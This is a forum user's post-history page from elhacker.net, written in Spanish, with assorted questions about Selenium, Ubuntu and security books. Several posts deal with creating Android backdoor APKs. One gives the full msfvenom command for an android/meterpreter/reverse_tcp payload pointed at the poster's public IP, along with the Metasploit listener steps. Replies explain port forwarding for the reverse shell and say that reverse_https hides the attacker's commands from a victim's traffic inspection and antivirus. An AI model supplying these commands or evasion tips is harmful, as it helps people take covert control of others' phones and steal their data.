elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 2 3 [4]
31  Programación / Scripting / Error de selenium - Python en: 17 Junio 2021, 11:22 am
"Unknow error unable to discover open pages"

Es ese el error que me aparece en consola luego de ejecutar mi programa.

Hace unos días que quise empezar a hacer ejercicios de web scraping con python y selenium porque por lo que leí es la opción más completa y fácil de aprender pero lo único que he conseguido es que se abra una ventana de Google Chrome, luego de eso se cierra y aparece el error en consola sin haber accedido a la url que le indico.

https://ibb.co/p4BKkCF (dejo aquí un link hacia la imagen de lo que aparece en consola, no sé bien si hay otra forma de insertar imágenes aquí)

Me aseguré que la versión de webdrive que descargué fuera la indicada para mi navegador intenté incluso con cosas que seguramente no tenían nada que ver con el problema, actualicé pip y reinstale selenium y nada.  :-\

https://ibb.co/y8F35XH (este es el código que escribí)
32  Sistemas Operativos / GNU/Linux / Re: No me deja instalar ubuntu en: 1 Mayo 2020, 01:07 am
Deberías dar mas detalles para poder ayudarte, realmente no dices mucho con eso. De qué se trata el error? que pasa cuando lo instalas? si directamente pudieses grabar pues no estaría mal
33  Sistemas Operativos / GNU/Linux / Re: No me deja instalar ubuntu en: 29 Abril 2020, 12:52 pm
que problema presentas? Te refieres a que te da un error durante la instalación o que no sabes como instalarlo?
34  Seguridad Informática / Hacking / Bots? que son y como funcionan? en: 11 Abril 2020, 16:02 pm
Hola a todo aquel que esté leyendo este post.
Llevo ya algunos años estudiando automatización industrial en la universidad y hasta ha ahora he sido capaz de crear autómatas programables que son básicamente pequeños robots que automatizan procesos industriales, incluso mi pc tiene algunas partes automatizadas, ventiladores que aumentan o disminuyen su velocidad dependiendo de la temperatura en el ambiente.

Solo sé contruir sistemas automáticos analógios y programarlos con arduino, aún no tengo mucho conocimiento sobre la automatización digital y hasta donde tengo entendido un bot es básicamente lo mismo, un programa que automatiza procesos de cualquier tipo, y me interesa mucho la automatización y la inteligencia artifical.

Entonces me preguntaba si alguien aquí sabe donde puedo encontrar información sobre el tema de los bots, o si ya hay algún tipo de información sobre eso en este foro, como funcionan y como interactuan con los demás programas, sería de gran utilidad.

(No sé si mi post está mal ubicado, de ser así haganmelo saber por favor, no tengo mucha experiencia en foros)

Gracias
35  Seguridad Informática / Hacking / Libros que recomienden? en: 14 Marzo 2020, 09:34 am
Hola, hay algún libro en particular que recomienden y que pueda aportar al aprendizaje de seguridad informática? Acepto cualquier sugerencia, libros sobre redes, tutoriales, técnicas, programas, lo que sea, gracias.
36  Seguridad Informática / Hacking / Re: Problema, ataques fuera de red. en: 10 Marzo 2020, 07:41 am
Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta.

La única herramienta que instalé en ese entonces fue NO-IP.

Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes  ;-)




Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444.
Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.

37  Seguridad Informática / Hacking / Re: Problema, ataques fuera de red. en: 9 Marzo 2020, 23:50 pm
No es una solución en si, ya que antes podía realizar ese tipo de tareas sin necesidad de otras aplicaciones, simplemente metasploit y no-ip, pero con el problema que se me ha presentado ngrok me ha sido muy útil, gracias por la información.  ::)
38  Seguridad Informática / Hacking / Problema, ataques fuera de red. en: 6 Marzo 2020, 04:21 am
Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad.

El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera.

msfvenom -p android/meterpreter/reverse_tcp  lhost=<mi ip publica>  lport=4444 R>/root/Escritorio/aplicacion.apk

Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma.

1) use exploit/multi/hander
2) set payload android/meterpreter/reverse_tcp
3) set lport=<mi ip local> y también set lport=444
5) exploit

Aún configurando la aplicación de esa manera sigue sin funcionar  :-\
¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo?

¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local.


Gracias.
39  Seguridad Informática / Hacking / Re: reverse_tcp o reverse_https? en: 1 Marzo 2020, 16:34 pm
Hice la prueba con todo lo que me dijiste y realmente funciono, muchas gracias  ;D

HTTPS son 3 capas/protocolos. La capa TCP/IP, encima va la capa SSH y encima va la capa http. Las 3 juntas forman HTTPS.

Es decir, es lo mismo que un TCP inverso pero añade una capa de negociación de cifrado y utiliza el protocolo http. Esto significa que en vez de conectarse directamente en un stream de bytes sin cifrado, negocia el cifrado con tu cliente y una vez se establece una canal cifrado, realiza una petición a tu cliente utilizando el protocolo http.

El protocolo http es texto plano que sigue una forma estandarizada de comunicarse. Para simplificarlo mentalmente puedes entender como si http fuese un lenguaje de programación. Por ejemplo para conectarte a google.com mediante http tu navegador envía:
Código
  1. GET / HTTP/1.1
  2. Host: google.com:80
  3. Connection: keep-alive:
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 6.0) Chrome /Version ...
  7. Accept: text/plain,text/html...
  8. Acept-Language: es-Es...

Entonces google te podría responder algo como:
Código
  1. HTTP/1.1 200 OK
  2. content-type: text/html
  3.  
  4. <html><body>Hola</body></html>

Esto significa que si la víctima instala un https inverso, va a hacer una petición para negociar la conexión (msfvenom tiene un cliente ssh y manejo de sesiones) una vez se establezca el canal seguro, te va a enviar la petición GET y tu le debes responder con un 200 OK enviándole una lista de comandos para que los ejecute o lo que sea.

Si quieres probar, puedes hacer lo siguiente desde la terminal:
netcat -v -l -k 127.0.0.1 8080

Con esto tienes un "servidor" a la escucha en la terminal. Si ahora vas al navegador y pones:
http://127.0.0.1:8080
Verás que te llega una petición http GET a la terminal.

El navegador se quedará como cargando a la espera de una respuesta HTTP. Podrías escribirla en la terminal para contestar o hacer cat a un archivo o cualquier historia.

Si ahora pones https://127.0.0.1:8080 verás como se envía unos "caracteres" raros. No es texto, son bytes, pero la terminal intenta traducirlo a texto y por eso se ve raro. Esta es la capa SSH sobre HTTP que sirve para que alguien inspeccionado el tráfico no pueda ver que es lo que se envia.
De esta forma, si la victima pusiese un analizador de tráfico en su red, no vería que pone: comandos: subir imágenes, descargar malware, ...
O si el antivirus lo hace, tampoco podrá detectar automáticamente la conexión robando datos personales.
40  Seguridad Informática / Hacking / reverse_tcp o reverse_https? en: 29 Febrero 2020, 04:30 am
Hola, hace poco que inicie a familiarizarme con kali linux y sus herramientas. He estado creando Backdoors para android con mfsvenom utilizando el siguiente payload:

android/meterpreter/reverse_tcp

Pero hace poco me di cuenta viendo algunos tutoriales que algunas personas lo utilizan de esta manera:

android/meterpreter/reverse_https


Alguien podría aclararme que diferencia hay entre los dos?
O si es más conveniente usar uno u otro en casos específicos.

Cualquier otra información adicional me vendría de maravilla. Gracias.  :D
Páginas: 1 2 3 [4]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines